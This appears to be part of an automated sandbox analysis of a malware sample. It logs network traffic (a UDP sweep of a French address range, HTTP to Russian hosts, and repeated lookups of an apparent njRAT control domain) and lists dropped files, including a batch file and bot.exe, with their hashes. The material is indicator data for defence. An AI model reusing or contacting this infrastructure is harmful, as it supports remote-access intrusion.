FR 87.98.178.6:6893 udp
FR 87.98.178.7:6893 udp
FR 87.98.178.8:6893 udp
FR 87.98.178.9:6893 udp
FR 87.98.178.10:6893 udp
FR 87.98.178.11:6893 udp
FR 87.98.178.12:6893 udp
FR 87.98.178.13:6893 udp
FR 87.98.178.14:6893 udp
FR 87.98.178.15:6893 udp
FR 87.98.178.16:6893 udp
FR 87.98.178.17:6893 udp
FR 87.98.178.18:6893 udp
FR 87.98.178.19:6893 udp
FR 87.98.178.20:6893 udp
FR 87.98.178.21:6893 udp
FR 87.98.178.22:6893 udp
FR 87.98.178.23:6893 udp
FR 87.98.178.24:6893 udp
FR 87.98.178.25:6893 udp
FR 87.98.178.26:6893 udp
FR 87.98.178.27:6893 udp
FR 87.98.178.28:6893 udp
FR 87.98.178.29:6893 udp
FR 87.98.178.30:6893 udp
FR 87.98.178.31:6893 udp
FR 87.98.178.32:6893 udp
FR 87.98.178.33:6893 udp
FR 87.98.178.34:6893 udp
FR 87.98.178.35:6893 udp
FR 87.98.178.36:6893 udp
FR 87.98.178.37:6893 udp
FR 87.98.178.38:6893 udp
FR 87.98.178.39:6893 udp
FR 87.98.178.40:6893 udp
FR 87.98.178.41:6893 udp
FR 87.98.178.42:6893 udp
FR 87.98.178.43:6893 udp
FR 87.98.178.44:6893 udp
FR 87.98.178.45:6893 udp
FR 87.98.178.46:6893 udp
FR 87.98.178.47:6893 udp
FR 87.98.178.48:6893 udp
FR 87.98.178.49:6893 udp
FR 87.98.178.50:6893 udp
FR 87.98.178.51:6893 udp
FR 87.98.178.52:6893 udp
FR 87.98.178.53:6893 udp
FR 87.98.178.54:6893 udp
FR 87.98.178.55:6893 udp
FR 87.98.178.56:6893 udp
FR 87.98.178.57:6893 udp
FR 87.98.178.58:6893 udp
FR 87.98.178.59:6893 udp
FR 87.98.178.60:6893 udp
FR 87.98.178.61:6893 udp
FR 87.98.178.62:6893 udp
FR 87.98.178.63:6893 udp
FR 87.98.178.64:6893 udp
FR 87.98.178.65:6893 udp
FR 87.98.178.66:6893 udp
FR 87.98.178.67:6893 udp
FR 87.98.178.68:6893 udp
FR 87.98.178.69:6893 udp
FR 87.98.178.70:6893 udp
FR 87.98.178.71:6893 udp
FR 87.98.178.72:6893 udp
FR 87.98.178.73:6893 udp
FR 87.98.178.74:6893 udp
FR 87.98.178.75:6893 udp
FR 87.98.178.76:6893 udp
FR 87.98.178.77:6893 udp
FR 87.98.178.78:6893 udp
FR 87.98.178.79:6893 udp
FR 87.98.178.80:6893 udp
FR 87.98.178.81:6893 udp
FR 87.98.178.82:6893 udp
FR 87.98.178.83:6893 udp
FR 87.98.178.84:6893 udp
FR 87.98.178.85:6893 udp
FR 87.98.178.86:6893 udp
FR 87.98.178.87:6893 udp
FR 87.98.178.88:6893 udp
FR 87.98.178.89:6893 udp
FR 87.98.178.90:6893 udp
FR 87.98.178.91:6893 udp
FR 87.98.178.92:6893 udp
FR 87.98.178.93:6893 udp
FR 87.98.178.94:6893 udp
FR 87.98.178.95:6893 udp
FR 87.98.178.96:6893 udp
FR 87.98.178.97:6893 udp
FR 87.98.178.98:6893 udp
FR 87.98.178.99:6893 udp
FR 87.98.178.100:6893 udp
FR 87.98.178.101:6893 udp
FR 87.98.178.102:6893 udp
FR 87.98.178.103:6893 udp
FR 87.98.178.104:6893 udp
FR 87.98.178.105:6893 udp
FR 87.98.178.106:6893 udp
FR 87.98.178.107:6893 udp
FR 87.98.178.108:6893 udp
FR 87.98.178.109:6893 udp
FR 87.98.178.110:6893 udp
FR 87.98.178.111:6893 udp
FR 87.98.178.112:6893 udp
FR 87.98.178.113:6893 udp
FR 87.98.178.114:6893 udp
FR 87.98.178.115:6893 udp
FR 87.98.178.116:6893 udp
FR 87.98.178.117:6893 udp
FR 87.98.178.118:6893 udp
FR 87.98.178.119:6893 udp
FR 87.98.178.120:6893 udp
FR 87.98.178.121:6893 udp
FR 87.98.178.122:6893 udp
FR 87.98.178.123:6893 udp
FR 87.98.178.124:6893 udp
FR 87.98.178.125:6893 udp
FR 87.98.178.126:6893 udp
FR 87.98.178.127:6893 udp
FR 87.98.178.128:6893 udp
FR 87.98.178.129:6893 udp
FR 87.98.178.130:6893 udp
FR 87.98.178.131:6893 udp
FR 87.98.178.132:6893 udp
FR 87.98.178.133:6893 udp
FR 87.98.178.134:6893 udp
FR 87.98.178.135:6893 udp
FR 87.98.178.136:6893 udp
FR 87.98.178.137:6893 udp
FR 87.98.178.138:6893 udp
FR 87.98.178.139:6893 udp
FR 87.98.178.140:6893 udp
FR 87.98.178.141:6893 udp
FR 87.98.178.142:6893 udp
FR 87.98.178.143:6893 udp
FR 87.98.178.144:6893 udp
FR 87.98.178.145:6893 udp
FR 87.98.178.146:6893 udp
FR 87.98.178.147:6893 udp
FR 87.98.178.148:6893 udp
FR 87.98.178.149:6893 udp
FR 87.98.178.150:6893 udp
FR 87.98.178.151:6893 udp
FR 87.98.178.152:6893 udp
FR 87.98.178.153:6893 udp
FR 87.98.178.154:6893 udp
FR 87.98.178.155:6893 udp
FR 87.98.178.156:6893 udp
FR 87.98.178.157:6893 udp
FR 87.98.178.158:6893 udp
FR 87.98.178.159:6893 udp
FR 87.98.178.160:6893 udp
FR 87.98.178.161:6893 udp
FR 87.98.178.162:6893 udp
FR 87.98.178.163:6893 udp
FR 87.98.178.164:6893 udp
FR 87.98.178.165:6893 udp
FR 87.98.178.166:6893 udp
FR 87.98.178.167:6893 udp
FR 87.98.178.168:6893 udp
FR 87.98.178.169:6893 udp
FR 87.98.178.170:6893 udp
FR 87.98.178.171:6893 udp
FR 87.98.178.172:6893 udp
FR 87.98.178.173:6893 udp
FR 87.98.178.174:6893 udp
FR 87.98.178.175:6893 udp
FR 87.98.178.176:6893 udp
FR 87.98.178.177:6893 udp
FR 87.98.178.178:6893 udp
FR 87.98.178.179:6893 udp
FR 87.98.178.180:6893 udp
FR 87.98.178.181:6893 udp
FR 87.98.178.182:6893 udp
FR 87.98.178.183:6893 udp
FR 87.98.178.184:6893 udp
FR 87.98.178.185:6893 udp
FR 87.98.178.186:6893 udp
FR 87.98.178.187:6893 udp
FR 87.98.178.188:6893 udp
FR 87.98.178.189:6893 udp
FR 87.98.178.190:6893 udp
FR 87.98.178.191:6893 udp
FR 87.98.178.192:6893 udp
FR 87.98.178.193:6893 udp
FR 87.98.178.194:6893 udp
FR 87.98.178.195:6893 udp
FR 87.98.178.196:6893 udp
FR 87.98.178.197:6893 udp
FR 87.98.178.198:6893 udp
FR 87.98.178.199:6893 udp
FR 87.98.178.200:6893 udp
FR 87.98.178.201:6893 udp
FR 87.98.178.202:6893 udp
FR 87.98.178.203:6893 udp
FR 87.98.178.204:6893 udp
FR 87.98.178.205:6893 udp
FR 87.98.178.206:6893 udp
FR 87.98.178.207:6893 udp
FR 87.98.178.208:6893 udp
FR 87.98.178.209:6893 udp
FR 87.98.178.210:6893 udp
FR 87.98.178.211:6893 udp
FR 87.98.178.212:6893 udp
FR 87.98.178.213:6893 udp
FR 87.98.178.214:6893 udp
FR 87.98.178.215:6893 udp
FR 87.98.178.216:6893 udp
FR 87.98.178.217:6893 udp
FR 87.98.178.218:6893 udp
FR 87.98.178.219:6893 udp
FR 87.98.178.220:6893 udp
FR 87.98.178.221:6893 udp
FR 87.98.178.222:6893 udp
FR 87.98.178.223:6893 udp
FR 87.98.178.224:6893 udp
FR 87.98.178.225:6893 udp
FR 87.98.178.226:6893 udp
FR 87.98.178.227:6893 udp
FR 87.98.178.228:6893 udp
FR 87.98.178.229:6893 udp
FR 87.98.178.230:6893 udp
FR 87.98.178.231:6893 udp
FR 87.98.178.232:6893 udp
FR 87.98.178.233:6893 udp
FR 87.98.178.234:6893 udp
FR 87.98.178.235:6893 udp
FR 87.98.178.236:6893 udp
FR 87.98.178.237:6893 udp
FR 87.98.178.238:6893 udp
FR 87.98.178.239:6893 udp
FR 87.98.178.240:6893 udp
FR 87.98.178.241:6893 udp
FR 87.98.178.242:6893 udp
FR 87.98.178.243:6893 udp
FR 87.98.178.244:6893 udp
FR 87.98.178.245:6893 udp
FR 87.98.178.246:6893 udp
FR 87.98.178.247:6893 udp
FR 87.98.178.248:6893 udp
FR 87.98.178.249:6893 udp
FR 87.98.178.250:6893 udp
FR 87.98.178.251:6893 udp
FR 87.98.178.252:6893 udp
FR 87.98.178.253:6893 udp
FR 87.98.178.254:6893 udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
FR 87.98.178.255:6893 udp
FR 87.98.179.0:6893 udp
FR 87.98.179.1:6893 udp
FR 87.98.179.2:6893 udp
FR 87.98.179.3:6893 udp
FR 87.98.179.4:6893 udp
FR 87.98.179.5:6893 udp
FR 87.98.179.6:6893 udp
FR 87.98.179.7:6893 udp
FR 87.98.179.8:6893 udp
FR 87.98.179.9:6893 udp
FR 87.98.179.10:6893 udp
FR 87.98.179.11:6893 udp
FR 87.98.179.12:6893 udp
FR 87.98.179.13:6893 udp
FR 87.98.179.14:6893 udp
FR 87.98.179.15:6893 udp
FR 87.98.179.16:6893 udp
FR 87.98.179.17:6893 udp
FR 87.98.179.18:6893 udp
FR 87.98.179.19:6893 udp
FR 87.98.179.20:6893 udp
FR 87.98.179.21:6893 udp
FR 87.98.179.22:6893 udp
FR 87.98.179.23:6893 udp
FR 87.98.179.24:6893 udp
FR 87.98.179.25:6893 udp
FR 87.98.179.26:6893 udp
FR 87.98.179.27:6893 udp
FR 87.98.179.28:6893 udp
FR 87.98.179.29:6893 udp
FR 87.98.179.30:6893 udp
FR 87.98.179.31:6893 udp
FR 87.98.179.32:6893 udp
FR 87.98.179.33:6893 udp
FR 87.98.179.34:6893 udp
FR 87.98.179.35:6893 udp
FR 87.98.179.36:6893 udp
FR 87.98.179.37:6893 udp
FR 87.98.179.38:6893 udp
FR 87.98.179.39:6893 udp
FR 87.98.179.40:6893 udp
FR 87.98.179.41:6893 udp
FR 87.98.179.42:6893 udp
FR 87.98.179.43:6893 udp
FR 87.98.179.44:6893 udp
FR 87.98.179.45:6893 udp
FR 87.98.179.46:6893 udp
FR 87.98.179.47:6893 udp
FR 87.98.179.48:6893 udp
FR 87.98.179.49:6893 udp
FR 87.98.179.50:6893 udp
FR 87.98.179.51:6893 udp
FR 87.98.179.52:6893 udp
FR 87.98.179.53:6893 udp
FR 87.98.179.54:6893 udp
FR 87.98.179.55:6893 udp
FR 87.98.179.56:6893 udp
FR 87.98.179.57:6893 udp
FR 87.98.179.58:6893 udp
FR 87.98.179.59:6893 udp
FR 87.98.179.60:6893 udp
FR 87.98.179.61:6893 udp
FR 87.98.179.62:6893 udp
FR 87.98.179.63:6893 udp
FR 87.98.179.64:6893 udp
FR 87.98.179.65:6893 udp
FR 87.98.179.66:6893 udp
FR 87.98.179.67:6893 udp
FR 87.98.179.68:6893 udp
FR 87.98.179.69:6893 udp
FR 87.98.179.70:6893 udp
FR 87.98.179.71:6893 udp
FR 87.98.179.72:6893 udp
FR 87.98.179.73:6893 udp
FR 87.98.179.74:6893 udp
FR 87.98.179.75:6893 udp
FR 87.98.179.76:6893 udp
FR 87.98.179.77:6893 udp
FR 87.98.179.78:6893 udp
FR 87.98.179.79:6893 udp
FR 87.98.179.80:6893 udp
FR 87.98.179.81:6893 udp
FR 87.98.179.82:6893 udp
FR 87.98.179.83:6893 udp
FR 87.98.179.84:6893 udp
FR 87.98.179.85:6893 udp
FR 87.98.179.86:6893 udp
FR 87.98.179.87:6893 udp
FR 87.98.179.88:6893 udp
FR 87.98.179.89:6893 udp
FR 87.98.179.90:6893 udp
FR 87.98.179.91:6893 udp
FR 87.98.179.92:6893 udp
FR 87.98.179.93:6893 udp
FR 87.98.179.94:6893 udp
FR 87.98.179.95:6893 udp
FR 87.98.179.96:6893 udp
FR 87.98.179.97:6893 udp
FR 87.98.179.98:6893 udp
FR 87.98.179.99:6893 udp
FR 87.98.179.100:6893 udp
FR 87.98.179.101:6893 udp
FR 87.98.179.102:6893 udp
FR 87.98.179.103:6893 udp
FR 87.98.179.104:6893 udp
FR 87.98.179.105:6893 udp
FR 87.98.179.106:6893 udp
FR 87.98.179.107:6893 udp
FR 87.98.179.108:6893 udp
FR 87.98.179.109:6893 udp
FR 87.98.179.110:6893 udp
FR 87.98.179.111:6893 udp
FR 87.98.179.112:6893 udp
FR 87.98.179.113:6893 udp
FR 87.98.179.114:6893 udp
FR 87.98.179.115:6893 udp
FR 87.98.179.116:6893 udp
FR 87.98.179.117:6893 udp
FR 87.98.179.118:6893 udp
FR 87.98.179.119:6893 udp
FR 87.98.179.120:6893 udp
FR 87.98.179.121:6893 udp
FR 87.98.179.122:6893 udp
FR 87.98.179.123:6893 udp
FR 87.98.179.124:6893 udp
FR 87.98.179.125:6893 udp
FR 87.98.179.126:6893 udp
FR 87.98.179.127:6893 udp
FR 87.98.179.128:6893 udp
FR 87.98.179.129:6893 udp
FR 87.98.179.130:6893 udp
FR 87.98.179.131:6893 udp
FR 87.98.179.132:6893 udp
FR 87.98.179.133:6893 udp
FR 87.98.179.134:6893 udp
FR 87.98.179.135:6893 udp
FR 87.98.179.136:6893 udp
FR 87.98.179.137:6893 udp
FR 87.98.179.138:6893 udp
FR 87.98.179.139:6893 udp
FR 87.98.179.140:6893 udp
FR 87.98.179.141:6893 udp
FR 87.98.179.142:6893 udp
FR 87.98.179.143:6893 udp
FR 87.98.179.144:6893 udp
FR 87.98.179.145:6893 udp
FR 87.98.179.146:6893 udp
FR 87.98.179.147:6893 udp
FR 87.98.179.148:6893 udp
FR 87.98.179.149:6893 udp
FR 87.98.179.150:6893 udp
FR 87.98.179.151:6893 udp
FR 87.98.179.152:6893 udp
FR 87.98.179.153:6893 udp
FR 87.98.179.154:6893 udp
FR 87.98.179.155:6893 udp
FR 87.98.179.156:6893 udp
FR 87.98.179.157:6893 udp
FR 87.98.179.158:6893 udp
FR 87.98.179.159:6893 udp
FR 87.98.179.160:6893 udp
FR 87.98.179.161:6893 udp
FR 87.98.179.162:6893 udp
FR 87.98.179.163:6893 udp
FR 87.98.179.164:6893 udp
FR 87.98.179.165:6893 udp
FR 87.98.179.166:6893 udp
FR 87.98.179.167:6893 udp
FR 87.98.179.168:6893 udp
FR 87.98.179.169:6893 udp
FR 87.98.179.170:6893 udp
FR 87.98.179.171:6893 udp
FR 87.98.179.172:6893 udp
FR 87.98.179.173:6893 udp
FR 87.98.179.174:6893 udp
FR 87.98.179.175:6893 udp
FR 87.98.179.176:6893 udp
FR 87.98.179.177:6893 udp
FR 87.98.179.178:6893 udp
FR 87.98.179.179:6893 udp
FR 87.98.179.180:6893 udp
FR 87.98.179.181:6893 udp
FR 87.98.179.182:6893 udp
FR 87.98.179.183:6893 udp
FR 87.98.179.184:6893 udp
FR 87.98.179.185:6893 udp
FR 87.98.179.186:6893 udp
FR 87.98.179.187:6893 udp
FR 87.98.179.188:6893 udp
FR 87.98.179.189:6893 udp
FR 87.98.179.190:6893 udp
FR 87.98.179.191:6893 udp
FR 87.98.179.192:6893 udp
FR 87.98.179.193:6893 udp
FR 87.98.179.194:6893 udp
FR 87.98.179.195:6893 udp
FR 87.98.179.196:6893 udp
FR 87.98.179.197:6893 udp
FR 87.98.179.198:6893 udp
FR 87.98.179.199:6893 udp
FR 87.98.179.200:6893 udp
FR 87.98.179.201:6893 udp
FR 87.98.179.202:6893 udp
FR 87.98.179.203:6893 udp
FR 87.98.179.204:6893 udp
FR 87.98.179.205:6893 udp
FR 87.98.179.206:6893 udp
FR 87.98.179.207:6893 udp
FR 87.98.179.208:6893 udp
FR 87.98.179.209:6893 udp
FR 87.98.179.210:6893 udp
FR 87.98.179.211:6893 udp
FR 87.98.179.212:6893 udp
FR 87.98.179.213:6893 udp
FR 87.98.179.214:6893 udp
FR 87.98.179.215:6893 udp
FR 87.98.179.216:6893 udp
FR 87.98.179.217:6893 udp
FR 87.98.179.218:6893 udp
FR 87.98.179.219:6893 udp
FR 87.98.179.220:6893 udp
FR 87.98.179.221:6893 udp
FR 87.98.179.222:6893 udp
FR 87.98.179.223:6893 udp
FR 87.98.179.224:6893 udp
FR 87.98.179.225:6893 udp
FR 87.98.179.226:6893 udp
FR 87.98.179.227:6893 udp
FR 87.98.179.228:6893 udp
FR 87.98.179.229:6893 udp
FR 87.98.179.230:6893 udp
FR 87.98.179.231:6893 udp
FR 87.98.179.232:6893 udp
FR 87.98.179.233:6893 udp
FR 87.98.179.234:6893 udp
FR 87.98.179.235:6893 udp
FR 87.98.179.236:6893 udp
FR 87.98.179.237:6893 udp
FR 87.98.179.238:6893 udp
FR 87.98.179.239:6893 udp
FR 87.98.179.240:6893 udp
FR 87.98.179.241:6893 udp
FR 87.98.179.242:6893 udp
FR 87.98.179.243:6893 udp
FR 87.98.179.244:6893 udp
FR 87.98.179.245:6893 udp
FR 87.98.179.246:6893 udp
FR 87.98.179.247:6893 udp
FR 87.98.179.248:6893 udp
FR 87.98.179.249:6893 udp
FR 87.98.179.250:6893 udp
FR 87.98.179.251:6893 udp
FR 87.98.179.252:6893 udp
FR 87.98.179.253:6893 udp
FR 87.98.179.254:6893 udp
FR 87.98.179.255:6893 udp
RU 91.218.114.4:80 91.218.114.4 tcp
RU 91.218.114.11:80 91.218.114.11 tcp
RU 91.218.114.25:80 91.218.114.25 tcp
RU 91.218.114.26:80 91.218.114.26 tcp
US 8.8.8.8:53 files.000webhost.com udp
US 145.14.144.15:21 files.000webhost.com tcp
RU 91.218.114.31:80 tcp
RU 92.63.107.12:80 tcp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
RU 92.63.107.12:80 tcp
US 8.8.8.8:53 15.144.14.145.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
N/A 195.20.16.153:80 195.20.16.153 tcp
US 8.8.8.8:53 nhatquanglan2.0catch.com udp
US 8.8.8.8:53 www.freewebs.com udp
US 104.18.38.120:80 www.freewebs.com tcp
GB 85.209.176.59:80 85.209.176.59 tcp
US 8.8.8.8:53 153.16.20.195.in-addr.arpa udp
US 8.8.8.8:53 59.176.209.85.in-addr.arpa udp
RU 91.218.114.31:80 tcp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 www.vistaprint.com udp
US 104.18.40.110:443 www.vistaprint.com tcp
US 8.8.8.8:53 120.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 110.40.18.104.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 85.209.176.59:80 85.209.176.59 tcp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 api.ipify.org udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.31:80 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 64.185.227.156:443 tcp
RU 91.218.114.32:80 tcp
RU 91.218.114.32:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 udp
RU 185.172.128.11:80 tcp
RU 91.218.114.32:80 tcp
US 8.8.8.8:53 86.140.236.47.in-addr.arpa udp
RU 91.218.114.32:80 tcp
US 8.8.8.8:53 202.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.37:80 91.218.114.37 tcp
RU 91.218.114.38:80 tcp
US 8.8.8.8:53 37.114.218.91.in-addr.arpa udp
US 47.236.140.86:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.37:80 91.218.114.37 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.38:80 tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
RU 91.218.114.38:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.38:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.77:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 45.148.244.112:7702 tcp
US 8.8.8.8:53 112.244.148.45.in-addr.arpa udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.77:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
N/A 127.0.0.1:56259 tcp
N/A 52.142.223.178:80 tcp
RU 91.218.114.77:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 204.201.50.20.in-addr.arpa udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.77:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.79:80 tcp
RU 45.15.156.43:1588 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.79:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.79:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.79:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 45.148.244.112:7702 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
DE 131.188.40.189:443 tcp
US 8.8.8.8:53 189.40.188.131.in-addr.arpa udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 204.201.50.20.in-addr.arpa udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 proativa.konkisti.com.br udp
US 107.161.183.211:443 proativa.konkisti.com.br tcp
US 8.8.8.8:53 211.183.161.107.in-addr.arpa udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat

MD5 6a83b03054f53cb002fdca262b76b102
SHA1 1bbafe19ae5bcdd4f3710f13d06332128a5d54f7
SHA256 7952248cb4ec97bc0d2ab3b51c126c7b0704a7f9d42bddf6adcb04b5657c7a4e
SHA512 fa8d907bb187f32de1cfbe1b092982072632456fd429e4dd92f62e482f2ad23e602cf845a2fd655d0e4b8314c1d7a086dc9545d4d82996afbccb364ddc1e9eae

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 172088b3de3423963dd5b186bfba5d5a
SHA1 ae46b6fad41c2dbdf4e07fdd7a45339ade367fa1
SHA256 ff5d796ae6962b6d65f274e449fed7add81c2387a87f21d3d0046996fe346621
SHA512 4afb7fbf831146579aeb24937cff8cb34829b1503d399d06c6c3e4c9ef59dcf51f662cc4c75d70821e04fbc7ec1c491afba5075ebcb6450ba6b620449efe9e19

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 db003c4009d8c78c76c21d895213a142
SHA1 28ffbe1e38bf55b6af08844044f21c21505f82e2
SHA256 915d37edc2a1063f59f38a82cd70e700dcc37e08388d27572b86a971028179c3
SHA512 c6300322788c6f1bdce552401c289e38c9c936a55fe85ca9ec84e57cd1b06266d000e99f34b9a2eb26d9661c7f76003e67e192e9aeb7946d5f223afc911dba03

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 844d98b287a5846e277c69fd58858c8d
SHA1 243a21edac3ee12971f57ea276bfad13cfddd2a7
SHA256 e426c9756b4ea080f4e66b73d7ec471abf3de7a39e76ed8689fb2ec4ed50bae4
SHA512 9f2ebf7d2901fe6260b95224e241b62fc275b90c9d2f8d882768b4203f1da331f2db3116fbfdec69758fcd6dce97d4a7162436295bff30d9276dd4ba34119776

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 1d19c0add62c9dfb7cd50c5808ce408e
SHA1 ab8fcb330254939aad027faf34d4fc3aa6f09d9b
SHA256 bf4f16fe568af58bba5eef5e7510ec4760fbd893e6d6c89354a83eff0bae62ac
SHA512 1c58fa51d041a88e46a7233cfe5f8a1c244044d03f28da3eb4624ca1f6380908c0047e1149cc3e5ef580ec6bbcdd6bbccecf475ebd54f3cca8e06174ea3f5e90

C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

